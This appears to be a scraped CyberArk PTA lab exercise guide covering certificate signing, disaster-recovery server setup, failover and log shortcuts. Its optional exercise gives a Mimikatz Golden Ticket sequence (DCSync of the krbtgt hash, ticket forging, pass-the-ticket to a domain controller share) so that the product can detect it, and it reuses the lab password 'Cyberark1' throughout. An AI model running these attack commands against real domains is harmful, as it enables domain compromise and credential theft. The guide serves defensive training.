12. Open a WinSCP connection to the PTAServer2 from via the PVWA. Make sure the
option Map local drives is enabled.
13. In the right-hand navigation pane, browse to the folder /opt/tomcat/ca.
14. In the left-hand pane, browse to the folder C:\CYBR_Files\
15. Copy the following file to the Downloads directory pta_server.csr, you can drag and
drop the file within WinSCP.
Signing the CSR
1. Launch Internet Explorer and you will arrive at the Microsoft Active Directory
Certificate Services page:
https://dc01.acme.corp/certsrv
2. If you get a security warning, click the option to proceed.
3. Click Request a certificate.
4. Click Advanced certificate request.
5. Copy all the contents of the pta_server.csr file (or from the PuTTY window) and paste
it in the relevant box as shown below:
3/21/2022
6. Select ACME Server from the Certificate Template drop-down menu and click
Submit.
7. Accept the certificate creation.
8. In the next screen select Download certificate, making sure it is DER encoded, and
save it as pta2.cer.
9. Return to the WinSCP application on ptaserver2 and transfer the files pta2.cer and
acme.cer (the Root authority certificate) to the PTA server, place both files in the
/tmp/ folder.
Installing the Certificate and its Chain
1. Re-open the PuTTY SSH connection to the ptaserver2.
2. Go to the utility folder /opt/tomcat/utility.
Reminder: You can also type “UTILITYDIR” to go directly to this directory
3. Launch the PTA utility using the following command:
./run.sh
4. Select option 15
5. Enter the full path to your new server certificate, which should be:
/tmp/pta2.cer
6. When asked if you have a Root certificate type y and then press Enter
3/21/2022
7. Then specify the full path to the Root certificate:
/tmp/acme.cer
8. When asked if you have an Intermediate certificate, type n and then press Enter
9. Make sure you see the message:
SSL Certificate Chain installed successfully.

Restarting PTA services...
10. PTA services will now be restarted automatically, please allow a moment for this to
take place.
9 Steps
Now we will run the 9-step configuration wizard. It is shorter than the first wizard because
this DR server will take most of its configuration from the Primary server.
1. On the Components server, start an SSH session to the ptaserver2 (either with
PuTTY or via the PSM).
2. Run the following command to navigate to the Wizard Folder:
cd /opt/tomcat/utility/dr
3. Run the following command to run the setup wizard:
./minimalPrepwiz.sh
4. Press y and then Enter to accept the EULA (the End User License Agreement, after
having read it carefully, of course).
5. No need to change root password, auto skip.
6. Press n and then Enter to use the pre-configured IP address of 10.0.0.3
7. Use the existing DNS server 10.0.0.1, select n (default) to continue.
Note: Make sure the configuration test was completed.
8. Press n and then Enter not to specify another DNS server.
9. Define the time zone of the PTA DR Server:
3/21/2022
right/Europe/London
10. Specify the current time in the system. Use Components date and current time as
system time. It should look something like:
06/29/2020 15:01
11. Enter n and then Enter not to configure synchronization with an NTP Server.
12. Step 5/9 it will auto configure the database.
13. Step 6/9 it will auto configure internal components
14. Step 7/9, it will create PTA maintenance user, type in the password:
Cyberark1
15. Retype password to confirm.
16. Step 8/9 will deploy the web application
17. Step 9/9 - Setup Disaster Recovery, first enter y to agree to continue.
18. Enter the SAN in FQDN format for the Primary server:
ptaserver1.acme.corp
19. Enter the SAN for the Secondary (DR):
20. Setup for DR should finish successfully:
Setup Disaster Recovery finished successfully
Primary Setup
As the final step for DR configuration, we will run a short wizard on the primary server
telling it there is now a DR server.
1. Launch a connection to ptaserver1.acme.corp using the PSM.
2. Run the following command to run the setup wizard:
3/21/2022
/opt/tomcat/utility/dr/setupPrimary.sh
3. Enter y to continue without taking a snapshot.
4. Set the Primary Subject Alternative Name (SAN):
5. Enter the Secondary Subject Alternative Name (SAN):
6. Specify the secondary PTA Server machine root password: Cyberark1
7. Setup for DR on the primary PTA should finish successfully as per below
Setup Disaster Recovery finished successfully
Check the configuration
As a final step in DR setup, we are going to check on each server that it has a file
identifying its current role.
1. Go to /opt/pta/mode on ptaserver1 and you should find a file called primary.
2. Then go to /opt/pta/mode on the DR server (ptaserver2) server and there should be

a file called secondary.
3. To verify the replication was successful, go to LOGSDIR or /opt/tomcat/logs and look

for dr-files-sync-success.log, this file should be present on both PTA servers. It
indicates the successful sync of data between the primary and secondary servers.
3/21/2022
4. Lastly, to verify both servers are online and communicating with each other, run the
following command on ptaserver1
RUN_DIAGNOSTICS P092
5. You should be able to see the following output, indicating both servers are online.
Failover to PTA DR Server
The process of failing over to the PTA DR server is a manual one. When an administrator
notices that the primary PTA has failed, he or she must log into the DR server and
promote it to the role of primary.
1. Log into the PVWA and open an SSH connection to the primary PTA server.
2. To shutdown the server, run the command:
shutdown now
You can close the PuTTy window.
3. Now launch an SSH connection to the secondary server (PTAServer2) and run the
command:
/opt/tomcat/utility/dr/promoteDemote.sh
4. You will receive a warning asking whether you want to continue. Enter y:
3/21/2022
This tool promotes the secondary PTA Server to Primary after the
primary Server fails. This tool can take some time to run and the
changes cannot be reversed.
We recommend taking a snapshot of each PTA Server before running the
tool.
Do you wish to continue? (y/n): y
5. You will then be prompted for the user name and password of a Vault user. Accept
Administrator and enter the password Cyberark1.
The script will perform its tasks and promote the secondary server to the primary role.
Disaster Recovery Promote/Demote finished successfully.

After promotion you must reconfigure PTA AD connectivity by retyping
the password of the PTA active directory user.
Also, edit the dbparm.ini file in the Vault, value SyslogServerIP with
the new PTA Primary IP, and restart the Vault.
6. We will need to re-enter the bind account user password. We do not need to
reconfigure dbparm.ini because the Vault has been configured to forward syslog
messages to both IP addresses for the PTA servers.
7. After a few minutes, run the following on PTAServer2 to verify that it has been
promoted to the primary role:
ls /opt/pta/mode
3/21/2022
Optional Exercises
Bring PTAServer1 back on-line as the DR server
Go to https://docs.cyberark.com and find the instructions for bringing a PTA server back
on-line after a failover.
Golden Ticket Attack using Mimikatz
The following exercise can be used as an additional test of the CyberArk PTA’s detection
capabilities. In this section we will detect a Golden Ticket attack. In this case we will
Mimikatz to generate the attack.
1. Launch a connection to target-win as the domain administrator. You can do this

from within the PVWA or by opening a new Windows session in Skytap. The
password, as always, is Cyberark1.
2. Go to the file C:\Mimikatz\x64\mimikatz.exe and run it as administrator.
3. Run:
privilege::debug
4. You should see:
Privilege ’20’ OK
5. Run the following:
3/21/2022
lsadump::dcsync /user:krbtgt
6. Copy the following SID and Hash NTLM values to Notepad so that we can use them
later (highlighted in red boxes below). For the SID, we are not copying the full string,
actually dropping the last 3 digits, we only need the domain’s SID.
Hint: You can copy the information in the command window by clicking on the kiwi icon in
the upper left-hand corner of the window and selecting Edit -> Mark and then using
the mouse to select the text to copy.
7. Now enter the following, making sure to replace the values with the values captured
by mimikatz:
3/21/2022
Kerberos::golden /user:badboy /domain:acme.corp /sid:SID_VALUE_COPIED

/krbtgt:HASH_VALUE_COPIED /ticket:badboy.tck /ptt
Your command should look something like:
Kerberos::golden /user:badboy /domain:acme.corp /sid:S-1-5-21-

3225096556-2775381509-898555345
/krbtgt:27c9916821a6d337eb6c1a2d0247f243 /ticket:badboy.tck /ptt
Your output should look something like this:
mimikatz # Kerberos::golden /user:badboy /domain:acme.corp /sid:S-1-5

-21-3225096556-2775381509-898555345
/krbtgt:27c9916821a6d337eb6c1a2d0247f243 /ticket:badboy.tck /ptt
User : badboy
Domain : acme.corp (ACME)
SID : S-1-5-21-3225096556-2775381509-898555345
User Id : 500
Groups Id : *513 512 520 518 519
ServiceKey: 27c9916821a6d337eb6c1a2d0247f243 - rc4_hmac_nt
Lifetime : 3/4/2022 4:26:41 AM ; 3/1/2032 4:26:41 AM ; 3/1/2032
4:26:41 AM
-> Ticket : ** Pass The Ticket **
* PAC generated
* PAC signed
* EncTicketPart generated
* EncTicketPart encrypted
* KrbCred generated
Golden ticket for 'badboy @ acme.corp' successfully submitted for

current session
mimikatz #
8. To open a command window with the new ticket, run:
misc::cmd
9. In the CMD window type “pushd \\DC01\c$” (Notice that you now have access to the
C drive of DC01 because you have injected the Kerberos Golden Ticket in memory
into the session).
Note: If this does not work immediately, try replacing “DC01” with the IP address of the
domain controller: 10.0.0.1 .
3/21/2022
10. Open the Security Events page in PVWA and you should now see a new security
event indicating a Golden Ticket Attack.
3/21/2022
Appendix
shortcuts.sh
Syntax: /opt/pta/utility/shortcuts.sh [<type>]
1 - Output all errors in the last part of the main PTA log file,
follow the file and output any errors as the file grows
Command: tail -f /opt/tomcat/logs/diamond.log | grep "ERROR"
2 - Output all errors in the main PTA log file
Command: cat /opt/tomcat/logs/diamond.log | grep "ERROR" | less
3 - Output all listener metrics in the last part of the main PTA log
file, follow the file and output any listener metrics as the file
grows.
Use this:
To verify incoming traffic from the sensors (such as Vault,
Network Sensor, SIEM)
To verify the creation of audits per operation (such as Vault
retrieve password, Vault logon, Windows logon, Unix logon, Kerberos
traffic)
To verify that the syslogs from the various SIEMs (such as
ArcSight, QRadar, Splunk, and so on) are successfully accepted in PTA
Command: tail -f /opt/tomcat/logs/diamond.log | grep "metrics-
PTA-listener"
4 - Output all listener metrics in the main PTA log file
Use this:
To verify incoming traffic from the sensors (such as Vault,
Network Sensor, SIEM)
To verify the creation of audits per operation (such as Vault
retrieve password, Vault logon, Windows logon, Unix logon, Kerberos
traffic)
To verify that the syslogs from the various SIEMs (such as
ArcSight, QRadar, Splunk, and so on) are successfully accepted in PTA
Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA-
listener" | less
5 - Output all sampler metrics in the last part of the main PTA log
file, follow the file and output any sampler metrics as the file
grows.
Use this:
To verify incident creation and that the outbound mail or
syslogs were sent
To verify mitigation results, such as rotate password upon
suspected credential theft
PTA-sampler"
6 - Output all sampler metrics in the main PTA log file
Use this:
To verify incident creation and that the outbound mail or
syslogs were sent
3/21/2022
To verify mitigation results, such as rotate password upon

suspected credential theft
sampler" | less
7 - Output all scheduled task metrics in the last part of the main
PTA log file, follow the file and output any scheduled task metrics as
the file grows.
Use this:
To verify the results of scheduled tasks, such as Active
Directory, Vault accounts and users, and so on
PTA-Background"
8 - Output all scheduled task metrics in the main PTA log file
Use this:
To verify the results of scheduled tasks, such as Active
Directory, Vault accounts and users, and so on
Background" | less
9 - Output all PTA internal services metrics in the last part of the
main PTA log file, follow the file and output any PTA internal
services metrics as the file grows.
PTA-services"
10 - Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA-
services" | less
11 - Output all metrics in the last part of the main PTA log file,
follow the file and output any metrics as the file grows
PTA"
12 - Output all metrics in the main PTA log file
Command: cat /opt/tomcat/logs/diamond.log | grep "metrics-PTA" |
less
13 - Output all incoming syslogs in the last part of the main PTA log
file, follow the file and output any incoming syslogs as the file
grows.
This requires the Listener component to be on Debug log level.
Use this:
To verify the incoming syslog from Vault / SIEM / Network
Sensor.
To see the syslog String received by the PTA from the different
inbound sources.
Command: tail -f /opt/tomcat/logs/diamond.log | grep "Incoming
syslog" - Requires Debug level of Listener
14 - Output all incoming syslogs in the main PTA log file.
This requires the Listener component to be on Debug log level.
Use this:
To verify the incoming syslog from Vault / SIEM / Network
Sensor.
To see the syslog String received by the PTA from the different
inbound sources.
3/21/2022
Command: cat /opt/tomcat/logs/diamond.log | grep "Incoming

syslog" | less - Requires Debug level of Listener
15 - Output all containment calls used in password rotation, pending
accounts, and PSM risky Commands in the last part of the main PTA log
file,
follow the file and output any containment calls as the file
grows.
Use this:
To troubleshoot issues with mitigation of various containment
capabilities such as Rotate Password, Pending un-managed accounts,
update Risky Commands scores in the PVWA.
Command: tail -f /opt/tomcat/logs/diamond.log | grep
"CyberArkAuthenticationService.svc/logon"
16 - Output all containment calls used in password rotation, pending
accounts, and PSM risky Commands in the main PTA log file.
Use this:
To troubleshoot issues with mitigation of various containment
capabilities such as Rotate Password, Pending un-managed accounts,
update Risky Commands scores in the PVWA.
Command: cat /opt/tomcat/logs/diamond.log | grep
"CyberArkAuthenticationService.svc/logon" | less
17 - Output all dcaserver metrics in the last part of the main PTA
log file, follow the file and output any dcaserver metrics as the file
grows.
Use this:
To troubleshoot configuration issues with the PTA Agents.
To troubleshoot connection issues between the PTA Agents and the
PTA Server
PTA-dcaserver"
18 - Output all dcaserver metrics in the main PTA log file
Use this:
To troubleshoot configuration issues with the PTA Agents.
To troubleshoot connection issues between the PTA Agents and the
PTA Server
dcaserver" | less
=====Aliases:=====
LOGSDIR - cd /opt/tomcat/logs
TAILDIAMOND - tail -f /opt/tomcat/logs/diamond.log
LESSDIAMOND - less /opt/tomcat/logs/diamond.log
DEFAULTPARM - less /opt/tomcat/diamond-
resources/default/systemparm.properties
LOCALPARM - vi /opt/tomcat/diamond-
resources/local/systemparm.properties
VAULTSERVICESDIR - cd /opt/tomcat/VaultServices/
VAULTSERVICESLOG - less /opt/tomcat/VaultServices/Casos.Debug.log
CASOSSERVICESDIR - cd /opt/tomcat/CasosServices
3/21/2022
CASOSSERVICESLOG - less /opt/tomcat/CasosServices/Casos.Debug.log

NETWORK_SENSOR_DEVICES - cat /opt/ag/conf/pta_devices.conf
VERSION_NUMBER - cat /opt/tomcat/diamond-resources/version.properties
UPGRADE_HISTORY - cat /opt/tomcat/logs/upgrade_history.log
RUN_DIAGNOSTICS - /opt/pta/diag-tool/pta_tool.sh
SHOW_METRICS - /opt/pta/diag-tool/pta_tool.sh P037
AGENTSHELL - /opt/agentshell/run.sh
EXPORT_UTILITY - /opt/tomcat/utility/exportTool.sh
MONIT_STATUS - sudo -u monit /opt/monit/bin/monit status
STATISTICS - less /opt/tomcat/statistics/logs/statistics.log
UTILITYDIR - cd /opt/tomcat/utility
PREPWIZDIR - cd /opt/tomcat/prepwiz
DRDIR - cd /opt/tomcat/utility/dr
3/21/2022

PTA IC Exercise Guide v12.2.3

Uploaded by

Document Information

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

PTA IC Exercise Guide v12.2.3

Uploaded by

Copyright:

Available Formats

CyberArk Privileged Threat Analytics

Install & Configure

Privileged Threat Analytics Exercise Guide

CONFIGURING THE PRIMARY PTA SERVER ........................................................................................................... 12

UPGRADING TO VERSION 12.2 .......................................................................................................................................12

CyberArk University Exercise Guide Page 2

Step 17/18 – Deploying Web Application...........................................................................................................29

VAULT INTEGRATION ....................................................................................................................................................34

INSTALLING THE WINDOWS AGENT .................................................................................................................................41

TESTING THE INITIAL CONFIGURATION ................................................................................................................ 45

PREPARING THE ENVIRONMENT ......................................................................................................................................45

INSTALLING THE AGENT ON A DOMAIN CONTROLLER ......................................................................................... 63

INSTALLING THE PTA AGENT ..........................................................................................................................................63

KERBEROS ATTACKS ............................................................................................................................................. 69

CyberArk University Exercise Guide Page 3

Allow the PTA to perform automatic password rotation ...................................................................................69

ACTIVE DIRECTORY RISKS..................................................................................................................................... 81

EXPOSED CREDENTIALS .................................................................................................................................................81

MANAGING PTA ACCOUNTS WITH CYBERARK ..................................................................................................... 84

MANAGING THE PTA ADMINISTRATOR (WEB DASHBOARD) ................................................................................................84

SHORTCUTS UTILITY .....................................................................................................................................................86

PTA DR SERVER .................................................................................................................................................... 89

GETTING A CERTIFICATE ................................................................................................................................................89

OPTIONAL EXERCISES ........................................................................................................................................... 97

BRING PTASERVER1 BACK ON-LINE AS THE DR SERVER .......................................................................................................97

APPENDIX .......................................................................................................................................................... 101

CyberArk University Exercise Guide Page 4

CyberArk University Exercise Guide Page 5

CyberArk University Exercise Guide Page 6

5. You may need to adjust your bandwidth setting on slower connections

CyberArk University Exercise Guide Page 7

1. From the Start Menu launch Add a language.

2. Click Add a language

CyberArk University Exercise Guide Page 8

3. Select your Language, thereafter click Open

4. Select your specific locality or dialect, thereafter click Add

CyberArk University Exercise Guide Page 9

CyberArk University Exercise Guide Page 10

CyberArk University Exercise Guide Page 11

Configuring the Primary PTA Server

Our first tasks are to:

• Upgrade the main PTA to version 12.2.3

Upgrading to version 12.2

CyberArk University Exercise Guide Page 12

Copy the upgrade files to PTAServer1

1. Login to the server Components as Mike (password is Cyberark1). Launch the

2. On the CyberArk home page, select LDAP as the authentication method.

3. When prompted, enter Mike and his LDAP password: Cyberark1

CyberArk University Exercise Guide Page 13

5. In the WinSCP window, on the left-hand side, browse to C:\PTA Course\PTA-

Connect to PTAServer1 via PSM

1. Go back to the account root for ptaserver1.acme.corp and open an SSH

2. Change directory to /tmp and run the command to enable execution:

3. Next, execute the installation script.

CyberArk University Exercise Guide Page 14

4. You will be prompted to continue. Enter y and hit Enter.

Welcome to Privileged Threat Analytics version 12.2.3 installation

Do you want to continue?[Y/N] y

Getting a Certificate for the PTA Server

CyberArk University Exercise Guide Page 15

2. Go to the following directory and launch the PTA Utility tool:

3. Enter 14 as your menu option: Generating a Certificate Signing Request (CSR).

5. Enter the Organization name: ACME

6. Enter the department name: Training